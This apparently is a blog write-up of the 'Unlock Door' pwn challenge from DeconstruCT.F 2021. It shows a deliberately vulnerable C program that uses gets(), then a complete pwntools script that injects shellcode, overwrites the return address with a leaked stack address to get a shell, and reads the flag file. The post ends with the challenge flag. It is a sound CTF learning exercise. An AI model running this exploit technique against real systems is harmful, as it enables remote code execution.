--- layout: post title: "DeconstruCT.F 2021 | PWN | Unlock Door" date: 2021-10-03 13:37:00 +0700 tags: [ctf, writeup] --- <figure> <img src="https://cdn.discordapp.com/attachments/874145963407720513/894206917239513118/Group.png"> </figure> #### PWN | UNLOCK_DOOR (379 points | 22 solves) Challenge Description: ``` Hello Agent, I apologize for the unusual time of this mission but this mission is takes high priority I have accidentally locked myself in my office and the password that I have set for my office door does not work I assume that one of the janitors have accidentally reset the password Your mission is to unlock my office door Unfortunately the program that unlocks the door is not exposed to the network but there is another record keeping program that is exposed to the network and runs on the same machine. The connection info for the record keeper and the source code is included below. nc overly.uniquename.xyz 2082 ``` Given a source code.<br> record_keeper.c: ```c #include<stdio.h> #include<string.h> void get_record() { printf("Enter record:"); char record[128] = ""; gets(record); } int main(int argc,char **argv) { get_record(); } ``` The source code provided have a buffer overflow vulnerability (caused by gets() function). But when I try to connect to the given service, the service has a different output with the source code provided: <img src="https://cdn.discordapp.com/attachments/874554128553095198/894596106917384192/unknown.png"> **Solution:** I assumed that we should take advantage of the leaked address, and immediately tried to generate shellcode and jump to that address. Because our input is accommodated only 128 bytes. So we need an offset of 128, to overwrite the RBP, and 136 to overwrite the saved rip. Exploit: ```python #!/usr/bin/env python3 # -*- coding: utf-8 -*- from pwn import * from os import path import sys # ==========================[ Information DIR = path.dirname(path.abspath(__file__)) EXECUTABLE = "/chall" TARGET = DIR + EXECUTABLE HOST, PORT = "overly.uniquename.xyz", 2082 REMOTE, LOCAL = False, False # ==========================[ Tools elf = ELF(TARGET) elfROP = ROP(elf) # ==========================[ Configuration context.update( arch=["i386", "amd64", "aarch64"][1], endian="little", os="linux", log_level = ['debug', 'info', 'warn'][2], terminal = ['tmux', 'split-window', '-h'], ) # ==========================[ Exploit def exploit(io, libc=null): if LOCAL==True: #raw_input("Fire GDB!") if len(sys.argv) > 1 and sys.argv[1] == "d": choosen_gdb = [ "source /home/mydata/tools/gdb/gdb-pwndbg/gdbinit.py", # 0 - pwndbg "source /home/mydata/tools/gdb/gdb-peda/peda.py", # 1 - peda "source /home/mydata/tools/gdb/gdb-gef/.gdbinit-gef.py" # 2 - gef ][0] cmd = choosen_gdb + """ """ gdb.attach(io, gdbscript=cmd) io.recvuntil("location:") LEAKED_ADDRESS = int(io.recvline().strip().decode(), 16) print("LEAKED_ADDRESS :", hex(LEAKED_ADDRESS)) p = b"" p += asm(shellcraft.sh()) p += b"\x90" * (136 - len(p)) p += p64(LEAKED_ADDRESS) io.sendline(p) io.sendline("echo 'SEKTE GADENG'") io.sendline("cat unlock_door.sh") # flag location io.interactive() if __name__ == "__main__": io, libc = null, null if args.REMOTE: REMOTE = True io = remote(HOST, PORT) # libc = ELF("___") else: LOCAL = True io = process( [TARGET, ], env={ # "LD_PRELOAD":DIR+"/___", # "LD_LIBRARY_PATH":DIR+"/___", }, ) # libc = ELF("___") exploit(io, libc) ``` <img src="https://cdn.discordapp.com/attachments/874554128553095198/894597189307875358/unknown.png"><br> FLAG : **dsc{0pEN_5E5Ame}**